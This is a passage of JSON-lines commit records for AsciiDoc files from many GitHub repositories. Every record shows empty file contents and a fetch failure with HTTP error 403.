monitor.\n\nCyrille\n","repos":"aihua\/opennms,tdefilip\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,roskens\/opennms-pre-github,rdkgit\/opennms,tdefilip\/opennms,aihua\/opennms,roskens\/opennms-pre-github,tdefilip\/opennms,rdkgit\/opennms,tdefilip\/opennms,tdefilip\/opennms,tdefilip\/opennms,tdefilip\/opennms,rdkgit\/opennms,rdkgit\/opennms,aihua\/opennms,rdkgit\/opennms,rdkgit\/opennms,aihua\/opennms,aihua\/opennms,roskens\/opennms-pre-github,aihua\/opennms,roskens\/opennms-pre-github,aihua\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,roskens\/opennms-pre-github,roskens\/opennms-pre-github,roskens\/opennms-pre-github,rdkgit\/opennms,rdkgit\/opennms,aihua\/opennms,tdefilip\/opennms,rdkgit\/opennms,aihua\/opennms","old_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/HttpMonitor.adoc","new_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/HttpMonitor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rdkgit\/opennms.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"c61f6a22c3413f8763066088bc1b77cc71781be1","subject":"Update 2016-05-06-Welcome-Pepper.adoc","message":"Update 2016-05-06-Welcome-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-06-Welcome-Pepper.adoc","new_file":"_posts\/2016-05-06-Welcome-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1d2e54048769bd21aba901f2cc8942a65697fce8","subject":"Update 2016-04-08-Redireccionamiento-invalido-basico.adoc","message":"Update 2016-04-08-Redireccionamiento-invalido-basico.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-08-Redireccionamiento-invalido-basico.adoc","new_file":"_posts\/2016-04-08-Redireccionamiento-invalido-basico.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6eccd84ef4f7c5251628efbd49cb3d8f39d3b515","subject":"Update 2016-03-19-Kitap-Arsivleri.adoc","message":"Update 2016-03-19-Kitap-Arsivleri.adoc","repos":"sinemaga\/sinemaga.github.io,sinemaga\/sinemaga.github.io,sinemaga\/sinemaga.github.io,sinemaga\/sinemaga.github.io","old_file":"_posts\/2016-03-19-Kitap-Arsivleri.adoc","new_file":"_posts\/2016-03-19-Kitap-Arsivleri.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sinemaga\/sinemaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"74c1f860292e3ea99fcf210fc0b343a9338e3004","subject":"Update 2015-07-09-Believing-in-people.adoc","message":"Update 2015-07-09-Believing-in-people.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2015-07-09-Believing-in-people.adoc","new_file":"_posts\/2015-07-09-Believing-in-people.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3f84d9c98844d316f6f55098b8e8f89762ab0515","subject":"Update 2016-5-13-Engineer-Career-Path.adoc","message":"Update 2016-5-13-Engineer-Career-Path.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-5-13-Engineer-Career-Path.adoc","new_file":"_posts\/2016-5-13-Engineer-Career-Path.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"77d2d11d1e016f6042c2672131cce82003907cbd","subject":"Update 2016-04-04-Javascript.adoc","message":"Update 2016-04-04-Javascript.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Javascript.adoc","new_file":"_posts\/2016-04-04-Javascript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9c1d30d8483d82b6cd1f0b62b16afe177251fe3","subject":"Update 2017-06-19-serposcope.adoc","message":"Update 2017-06-19-serposcope.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-19-serposcope.adoc","new_file":"_posts\/2017-06-19-serposcope.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"279c6c7a42a9dff56abb284e3c67e4e6fc5faf15","subject":"SWARM-1664 MP Fault tolerance build should trigger TCK by default correct readme to introduce new property to skip TCK","message":"SWARM-1664 MP Fault tolerance build should trigger TCK by default\ncorrect readme to introduce new property to skip TCK\n\nSigned-off-by: Antoine Sabot-Durand <9359a4d812173b65a3a0094cd86363e79731a3c2@sabot-durand.net>\n","repos":"wildfly-swarm\/wildfly-swarm,juangon\/wildfly-swarm,nelsongraca\/wildfly-swarm,nelsongraca\/wildfly-swarm,kenfinnigan\/wildfly-swarm,nelsongraca\/wildfly-swarm,nelsongraca\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,kenfinnigan\/wildfly-swarm,kenfinnigan\/wildfly-swarm,juangon\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,juangon\/wildfly-swarm,juangon\/wildfly-swarm,kenfinnigan\/wildfly-swarm,nelsongraca\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,kenfinnigan\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,wildfly-swarm\/wildfly-swarm-core,wildfly-swarm\/wildfly-swarm-core,wildfly-swarm\/wildfly-swarm,juangon\/wildfly-swarm,wildfly-swarm\/wildfly-swarm","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wildfly-swarm\/wildfly-swarm.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6bb738be3b1205da8f8f8b9613babe84db73dcf2","subject":"Add README","message":"Add README\n","repos":"sauthieg\/wisdom-oauth2-protection","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sauthieg\/wisdom-oauth2-protection.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7e21bd592b711972c702b4c38f2e3590c59545ea","subject":"Fix broken example in README","message":"Fix broken example in README\n","repos":"rumpelsepp\/pynote","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rumpelsepp\/pynote.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4200f5409a113da1d66413039295c07ce4ae022f","subject":"Added basic readme (#13)","message":"Added basic readme (#13)\n\n","repos":"hawkular\/hawkular-services,hawkular\/hawkular-services","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hawkular\/hawkular-services.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e8f73820ea1b882c813c783e8e8cf0db915fff3f","subject":"Update 2015-10-08-Markov.adoc","message":"Update 2015-10-08-Markov.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2015-10-08-Markov.adoc","new_file":"_posts\/2015-10-08-Markov.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8754672c20acb9fcc765e45b38e193ae5e9340c6","subject":"Update 2016-11-11-Pepper.adoc","message":"Update 2016-11-11-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-11-Pepper.adoc","new_file":"_posts\/2016-11-11-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f4922a11d5c357746f86627e833dfdd5c54c365","subject":"Update 2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","message":"Update 2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_file":"_posts\/2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bfb2a20e72b83a921978748a2efb4cb44895016e","subject":"Update 2015-01-31-Useful-Rails-Helper-part2.adoc","message":"Update 2015-01-31-Useful-Rails-Helper-part2.adoc","repos":"rubyinhell\/hubpress.io,rubyinhell\/hubpress.io,rubyinhell\/hubpress.io,rubyinhell\/hubpress.io","old_file":"_posts\/2015-01-31-Useful-Rails-Helper-part2.adoc","new_file":"_posts\/2015-01-31-Useful-Rails-Helper-part2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rubyinhell\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c1ca47270aa6e0b347b2a04dce4e59cbccc130ae","subject":"Update 2016-12-14-Hello-world.adoc","message":"Update 2016-12-14-Hello-world.adoc","repos":"moonPress\/press.io,moonPress\/press.io,moonPress\/press.io,moonPress\/press.io","old_file":"_posts\/2016-12-14-Hello-world.adoc","new_file":"_posts\/2016-12-14-Hello-world.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/moonPress\/press.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f984fba9f1fdd63f6e40a4e9e026f658edc68adb","subject":"Update 2017-10-16-Danphe-BaaS.adoc","message":"Update 2017-10-16-Danphe-BaaS.adoc","repos":"Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs,Nepal-Blockchain\/danphe-blogs","old_file":"_posts\/2017-10-16-Danphe-BaaS.adoc","new_file":"_posts\/2017-10-16-Danphe-BaaS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Nepal-Blockchain\/danphe-blogs.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f90c51039a255b6fd50e6e150f693e20300ae2f6","subject":"Update 2017-10-19-Hello-World.adoc","message":"Update 2017-10-19-Hello-World.adoc","repos":"chrizco\/chrizco.github.io,chrizco\/chrizco.github.io,chrizco\/chrizco.github.io,chrizco\/chrizco.github.io","old_file":"_posts\/2017-10-19-Hello-World.adoc","new_file":"_posts\/2017-10-19-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chrizco\/chrizco.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"adfda2a13b70d757c294817e811f9b39c9cc5bc6","subject":"y2b create post V-MODA Crossfade M-80 Headphones Unboxing \\u0026 Overview","message":"y2b create post V-MODA Crossfade M-80 Headphones Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-05-09-VMODA-Crossfade-M80-Headphones-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2013-05-09-VMODA-Crossfade-M80-Headphones-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d39b4a15f0b82a0bdb73fc089fba21b1772e24a2","subject":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","message":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"559e9c585edb4a1066c6e5b2682581f7688fd56e","subject":"Update 2016-02-04-Hallo-from-Tekk.adoc","message":"Update 2016-02-04-Hallo-from-Tekk.adoc","repos":"Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io","old_file":"_posts\/2016-02-04-Hallo-from-Tekk.adoc","new_file":"_posts\/2016-02-04-Hallo-from-Tekk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mentaxification\/Mentaxification.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b2e27c4d302a26fc4b9eb2225866914eb9ea355d","subject":"Update 2016-02-21-Django-Learning.adoc","message":"Update 2016-02-21-Django-Learning.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2016-02-21-Django-Learning.adoc","new_file":"_posts\/2016-02-21-Django-Learning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c8043e31552298d5ce32695f7cfa9890a1ac0e79","subject":"Update 2016-11-22-Tuesday-Morning.adoc","message":"Update 2016-11-22-Tuesday-Morning.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-22-Tuesday-Morning.adoc","new_file":"_posts\/2016-11-22-Tuesday-Morning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b8c75077c460acc66f88b1b710d247b5815a2c88","subject":"Add a few more badges","message":"Add a few more badges\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c86af2eb997a14994dd240e23b4b9c09dea407e6","subject":"Update 2018-02-23-make-book-manage-App.adoc","message":"Update 2018-02-23-make-book-manage-App.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3f3995c6897dc2a4723915c9bcb2d196bb19f667","subject":"Update 2018-02-23-make-book-manage-App.adoc","message":"Update 2018-02-23-make-book-manage-App.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b83b2b0c92e4251843c432cda12a7ff82ff2496e","subject":"Update 2015-06-11-Cousteau-61115.adoc","message":"Update 2015-06-11-Cousteau-61115.adoc","repos":"jsonify\/jsonify.github.io,jsonify\/jsonify.github.io,jsonify\/jsonify.github.io","old_file":"_posts\/2015-06-11-Cousteau-61115.adoc","new_file":"_posts\/2015-06-11-Cousteau-61115.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsonify\/jsonify.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d9a407a48276e4cfc2c5848711c9bcd341eb508f","subject":"Update 2017-03-10-Im-K-O-O-V-E-R.adoc","message":"Update 2017-03-10-Im-K-O-O-V-E-R.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-10-Im-K-O-O-V-E-R.adoc","new_file":"_posts\/2017-03-10-Im-K-O-O-V-E-R.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"78a0a53bb4baf3d3389f5711f7d621b0610e9db2","subject":"Update 2015-06-01-Es-geht-weiter.adoc","message":"Update 2015-06-01-Es-geht-weiter.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-06-01-Es-geht-weiter.adoc","new_file":"_posts\/2015-06-01-Es-geht-weiter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d2e6cd1ff0aa23ee93ac0f34d8010982729ca372","subject":"Update 2017-01-19-Swift-Web-View.adoc","message":"Update 2017-01-19-Swift-Web-View.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-19-Swift-Web-View.adoc","new_file":"_posts\/2017-01-19-Swift-Web-View.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5fe63ef2aa2d2ba248cae72598ef2d472279796","subject":"y2b create post GTA V Special Edition, RC Spider \\u0026 More (Deal Therapy)","message":"y2b create post GTA V Special Edition, RC Spider \\u0026 More (Deal Therapy)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-07-09-GTA-V-Special-Edition-RC-Spider-u0026-More-Deal-Therapy.adoc","new_file":"_posts\/2013-07-09-GTA-V-Special-Edition-RC-Spider-u0026-More-Deal-Therapy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"12c779a22b9d3faa21afc5d85abfb08684d65209","subject":"Update 2018-04-02-.adoc","message":"Update 2018-04-02-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-02-.adoc","new_file":"_posts\/2018-04-02-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa1878ad972fd9fe516a0bc2d76f56fe12cbf50d","subject":"Initial dbsupport documentation","message":"Initial dbsupport documentation\n\n[ci skip]\n","repos":"barspi\/jPOS-EE,jrfinc\/jPOS-EE,jpos\/jPOS-EE,jrfinc\/jPOS-EE,barspi\/jPOS-EE,jpos\/jPOS-EE,jpos\/jPOS-EE,barspi\/jPOS-EE,jrfinc\/jPOS-EE","old_file":"doc\/src\/asciidoc\/module_dbsupport.adoc","new_file":"doc\/src\/asciidoc\/module_dbsupport.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jrfinc\/jPOS-EE.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"b1e7534c70373460664f950a4286334836b1a6af","subject":"Publish 2095-1-1-Puzzle-6-Hackipedia.adoc","message":"Publish 2095-1-1-Puzzle-6-Hackipedia.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"2095-1-1-Puzzle-6-Hackipedia.adoc","new_file":"2095-1-1-Puzzle-6-Hackipedia.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f5dac69d66a9dedb8741adc33dd6d1ee591670ad","subject":"Update 2016-07-15-Testing-Getting-closer.adoc","message":"Update 2016-07-15-Testing-Getting-closer.adoc","repos":"erramuzpe\/gsoc2016,erramuzpe\/gsoc2016,erramuzpe\/gsoc2016,erramuzpe\/gsoc2016","old_file":"_posts\/2016-07-15-Testing-Getting-closer.adoc","new_file":"_posts\/2016-07-15-Testing-Getting-closer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/erramuzpe\/gsoc2016.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e7af87d4260e9f36dbb60e935c7d02dfa4bdf68e","subject":"Update 2014-09-28-HateStack-The-self-deleting-rantbin.adoc","message":"Update 2014-09-28-HateStack-The-self-deleting-rantbin.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2014-09-28-HateStack-The-self-deleting-rantbin.adoc","new_file":"_posts\/2014-09-28-HateStack-The-self-deleting-rantbin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b3ae038258dfc6fcc2e161523969d06fe9a8c2a","subject":"Update 2016-11-19-Second-blog.adoc","message":"Update 2016-11-19-Second-blog.adoc","repos":"yuyudhan\/yuyudhan.github.io,yuyudhan\/yuyudhan.github.io,yuyudhan\/yuyudhan.github.io,yuyudhan\/yuyudhan.github.io","old_file":"_posts\/2016-11-19-Second-blog.adoc","new_file":"_posts\/2016-11-19-Second-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yuyudhan\/yuyudhan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a8d6bbd885de4c822ee3fb0f2fafd0647e8c6b35","subject":"Update 2017-05-25-Hello-World.adoc","message":"Update 2017-05-25-Hello-World.adoc","repos":"PertuyF\/PertuyF.github.io,PertuyF\/PertuyF.github.io,PertuyF\/PertuyF.github.io,PertuyF\/PertuyF.github.io","old_file":"_posts\/2017-05-25-Hello-World.adoc","new_file":"_posts\/2017-05-25-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PertuyF\/PertuyF.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"02e42d3b5ebe8ca7bcd408a2e25c825651c8bfc2","subject":"added snoop-boot readme","message":"added snoop-boot readme\n","repos":"ivargrimstad\/snoopee,ivargrimstad\/snoopee,ivargrimstad\/snoop,ivargrimstad\/snoop,ivargrimstad\/snoop,ivargrimstad\/snoopee","old_file":"snoop-boot\/README.adoc","new_file":"snoop-boot\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ivargrimstad\/snoopee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8b892ccaf2e7f3f9fde879ca20e49175ded1d518","subject":"Update 2016-02-28-.adoc","message":"Update 2016-02-28-.adoc","repos":"Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io","old_file":"_posts\/2016-02-28-.adoc","new_file":"_posts\/2016-02-28-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Lh4cKg\/Lh4cKg.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f0a7997c0f07c56f57ac0c2049b7db80fb40ab20","subject":"Update 2017-10-20-vendanoapp.adoc","message":"Update 2017-10-20-vendanoapp.adoc","repos":"vendanoapp\/vendanoapp.github.io,vendanoapp\/vendanoapp.github.io,vendanoapp\/vendanoapp.github.io,vendanoapp\/vendanoapp.github.io","old_file":"_posts\/2017-10-20-vendanoapp.adoc","new_file":"_posts\/2017-10-20-vendanoapp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vendanoapp\/vendanoapp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"11928d8a9b0d5251a79e8765f4b53c64bd3fce8e","subject":"Update 2017-10-20-Desarrolla-tus-propios-hacks-para-videojuegos.adoc","message":"Update 2017-10-20-Desarrolla-tus-propios-hacks-para-videojuegos.adoc","repos":"chrizco\/chrizco.github.io,chrizco\/chrizco.github.io,chrizco\/chrizco.github.io,chrizco\/chrizco.github.io","old_file":"_posts\/2017-10-20-Desarrolla-tus-propios-hacks-para-videojuegos.adoc","new_file":"_posts\/2017-10-20-Desarrolla-tus-propios-hacks-para-videojuegos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chrizco\/chrizco.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1372a41addbcc43af1aca3b772931c7c9dcefc55","subject":"Update 2017-04-14-Azure-3.adoc","message":"Update 2017-04-14-Azure-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-14-Azure-3.adoc","new_file":"_posts\/2017-04-14-Azure-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"59d6ca310865b863a7cd51339483f773df2dd118","subject":"Add block_pass example","message":"Add block_pass 